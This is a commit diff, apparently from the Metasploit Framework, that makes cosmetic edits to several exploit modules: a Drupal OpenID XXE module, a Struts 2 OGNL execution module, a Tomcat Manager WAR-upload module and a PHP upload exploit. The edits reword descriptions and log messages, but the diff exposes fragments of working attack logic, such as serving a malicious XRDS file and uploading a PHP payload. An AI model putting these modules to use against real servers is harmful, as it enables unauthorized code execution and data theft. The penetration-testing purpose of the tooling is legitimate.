commit
ab4f62c44e
|
@ -17,10 +17,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
super(update_info(info,
|
||||
'Name' => 'Drupal OpenID External Entity Injection',
|
||||
'Description' => %q{
|
||||
This module abuses a XML External Entity Injection on the OpenID module
|
||||
from Drupal. The vulnerability exists on the parsing of a malformed XRDS
|
||||
file coming from a malicious OpenID endpoint. This module has been tested
|
||||
successfully in Drupal 7.15 and 7.2 with the OpenID module enabled.
|
||||
This module abuses an XML External Entity Injection
|
||||
vulnerability on the OpenID module from Drupal. The vulnerability exists
|
||||
in the parsing of a malformed XRDS file coming from a malicious OpenID
|
||||
endpoint. This module has been tested successfully on Drupal 7.15 and
|
||||
7.2 with the OpenID module enabled.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
@ -102,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
res = send_openid_auth(signature)
|
||||
|
||||
unless res
|
||||
vprint_status("Connection timed out")
|
||||
vprint_status("#{peer} - Connection timed out")
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
|
@ -157,12 +158,12 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def on_request_uri(cli, request)
|
||||
if request.uri =~ /#{@prefix}/
|
||||
vprint_status("Signature found, parsing file...")
|
||||
vprint_status("#{peer} - Signature found, parsing file...")
|
||||
@http_loot = parse_loot(request.uri)
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Sending XRDS...")
|
||||
print_status("#{peer} - Sending XRDS...")
|
||||
send_response_html(cli, xrds_file, { 'Content-Type' => 'application/xrds+xml' })
|
||||
end
|
||||
|
||||
|
|
|
@ -13,13 +13,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Apache Struts Developer Mode OGNL Execution',
|
||||
'Name' => 'Apache Struts 2 Developer Mode OGNL Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a remote command execution vulnerability in Apache
|
||||
Struts 2. The problem exists on applications running in developer mode,
|
||||
where the DebuggingInterceptor allows evaluation and execution of OGNL
|
||||
expressions, which allows remote attackers to execute arbitrary Java
|
||||
code. This module has been tested successfully in Struts 2.3.16, Tomcat
|
||||
code. This module has been tested successfully on Struts 2.3.16, Tomcat
|
||||
7 and Ubuntu 10.04.
|
||||
},
|
||||
'Author' =>
|
||||
|
|
|
@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Apache Tomcat Manager Application Upload Authenticated Code Execution',
|
||||
'Name' => 'Apache Tomcat Manager Authenticated Upload Code Execution',
|
||||
'Description' => %q{
|
||||
This module can be used to execute a payload on Apache Tomcat servers that
|
||||
have an exposed "manager" application. The payload is uploaded as a WAR archive
|
||||
|
@ -198,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
res = send_request_raw('uri' => path)
|
||||
|
||||
unless res and res.code == 200
|
||||
vprint_error("Failed: Error requesting #{path}")
|
||||
vprint_error("#{peer} - Failed: Error requesting #{path}")
|
||||
return nil
|
||||
end
|
||||
|
||||
|
@ -372,7 +372,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
if res.code < 200 or res.code >= 300
|
||||
vprint_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401
|
||||
vprint_error("Upload failed on #{upload_path} [#{res.code} #{res.message}]")
|
||||
vprint_error("#{peer} - Upload failed on #{upload_path} [#{res.code} #{res.message}]")
|
||||
return false
|
||||
end
|
||||
|
||||
|
|
|
@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
data.add_part(php, 'application/octet-stream', nil, "form-data; name=\"fileupload\"; filename=\"#{@fname}\"")
|
||||
post_data = data.to_s.gsub(/^\r\n--_Part_/, '--_Part_')
|
||||
|
||||
print_status("#{peer} - Uploading malicious file...")
|
||||
print_status("#{peer} - Uploading PHP payload...")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'upload.php'),
|
||||
|
|
|
@ -76,6 +76,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def exploit
|
||||
uri = normalize_uri(target_uri.path.to_s, "index.php")
|
||||
|
||||
vprint_status("#{peer} - Sending request to #{uri}.")
|
||||
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => uri,
|
||||
|
|
Loading…
Reference in New Issue